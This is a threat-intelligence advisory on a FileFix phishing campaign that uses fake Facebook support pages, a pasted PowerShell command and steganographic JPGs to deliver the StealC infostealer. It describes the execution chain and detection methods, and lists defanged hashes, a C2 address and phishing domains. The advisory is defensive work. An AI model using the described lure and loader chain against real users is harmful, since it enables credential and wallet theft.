September 18th, 2025

FileFix Campaign Uses Steganography to Deliver StealC Infostealer

High

Our Cyber Threat Intelligence Unit has identified an active FileFix social-engineering campaign distributing the StealC information stealer. The attack leverages multilingual phishing pages posing as Meta/Facebook support to exploit the “FileFix” technique, tricking victims into entering a malicious command into the Windows File Explorer address bar. This initiates a multi-stage payload chain that uses steganography to conceal secondary scripts within harmless-looking JPG files hosted on Bitbucket repositories. The final stage launches a Go-based loader that activates StealC, a stealer capable of harvesting browser credentials, crypto wallets, messaging apps, and cloud service credentials.

Technical Details

Attack Type: Social engineering (FileFix) with steganographic multi-stage payloads.
Severity: High.
Delivery Method: Victims visit phishing sites (e.g., fake Facebook support). The sites copy a crafted PowerShell command into the clipboard, tricking victims into pasting it into the File Explorer address bar.
Targeted Platforms: Windows endpoints with user interaction via browser and File Explorer.
Execution Chain:
- PowerShell one-liner launches → downloads JPGs from Bitbucket raw URLs.
- JPGs embed second-stage PowerShell and encrypted executables via steganography.
- In-memory decoding → execution of a Go-based loader.
- Loader unpacks shellcode, evades sandboxes, and executes StealC.

Impact

Credential Theft: StealC harvests browser cookies, saved credentials, messaging apps, and cloud (AWS, Azure) profiles.
Crypto Assets: Desktop/mobile wallets are targeted, and clipboard theft “clippers” may appear in variants.
Persistence / Expansion: Loader supports execution of additional payloads, expanding post-infection risk.
Detection Evasion: Steganography, obfuscation, and domain lookalikes reduce visibility to static detection and URL/attachment filtering.

Detection Method

Monitor for clipboard write events followed by Explorer.exe execution with non-file path arguments.
Create alerts for long, obfuscated PowerShell one-liners that retrieve JPGs/PNGs from developer hosting platforms like Bitbucket and GitHub.
Flag image downloads followed by PowerShell or Go loader execution.
Analyze suspicious images for embedded data (LSB anomalies, appended payloads).
Watch for process chains: browser/Explorer → PowerShell/MSHTA → Go loader → access to browser profiles, wallet DBs, or cloud CLI configs.

Indicators of Compromise

Type	Indicator	Description
SHA-256	70ae293eb1c023d40a8a48d6109a1bf792e1877a72433bcc89613461cffc7b61	Reported malicious hash
SHA-256	06471e1f500612f44c828e5d3453e7846f70c2d83b24c08ac9193e791f1a8130	Reported malicious hash
SHA-256	1801da172fae83cee2cc7c02f63e52d71f892d78e547a13718f146d5365f047c	Reported malicious hash
SHA-256	b3ce10cc997cd60a48a01677a152e21d4aa36ab5b2fd3718c04edef62662cea1	Reported malicious hash
IP Address	77[.]90[.]153[.]225	reported as the main C2
Domain	facebook[.]meta-software-worldwide[.]com facebook[.]windows-software-downloads[.]com facebook[.]windows-software-updates[.]cc facebook[.]windows-software-updates[.]com elprogresofood[.]com mastercompu[.]com thanjainatural[.]com Bitbucket[.]org/pibejiloiza/ Bitbucket[.]org/brubroddagrofe/ Bitbucket[.]org/creyaucuronna-4413/ Grabify[.]link/5M6TOW wl.google-587262[.]com – (Lookalike domain using MSHTA-style retrieval)	Phishing domains and Lookalike domains observed in related variants using MSHTA-style retrieval (reported as an example of variant lure). Confirm before blocking.

mix of red, purple, orange, blue bubble shape waves horizontal for cybersecurity and netwo

Recommendations

User Awareness: Educate users on FileFix/ClickFix lures — never paste clipboard contents into Explorer or system dialogs.
Script Control: Enforce Constrained Language Mode, enable AMSI/ScriptBlock logging, and flag obfuscated PowerShell fetching images.
Content Filtering: Block/monitor unexpected downloads from developer platforms (Bitbucket, GitHub) and flag anomalous image downloads.
EDR/Behavioral Rules: Detect in-memory decryption, Explorer→PowerShell chains, and unauthorized access to browser/wallet/cloud directories.
Threat Intel Feeds: Continuously ingest vendor feeds (Acronis, BleepingComputer, THN, Infosecurity) for updated IOCs and TTPs.

Conclusion

FileFix has rapidly evolved from a proof-of-concept to an active campaign. By combining clipboard-based social engineering with steganography and a modular loader, attackers can stealthily deliver StealC. Since StealC targets high-value assets like credentials, sessions, wallets, and cloud keys, we urge organizations to prioritize behavioral detection over static rules and to immediately rotate credentials if compromise is suspected.

References

https://thehackernews.com/2025/09/new-filefix-variant-delivers-stealc.html

https://www.acronis.com/en/tru/posts/filefix-in-the-wild-new-filefix-campaign-goes-beyond-poc-and-leverages-steganography/

https://www.infosecurity-magazine.com/news/filefix-steganography-multistage/

https://www.bleepingcomputer.com/news/security/new-filefix-attack-uses-steganography-to-drop-stealc-malware/

https://cyberpress.org/filefix-attack/

https://gbhackers.com/filefix-steganography/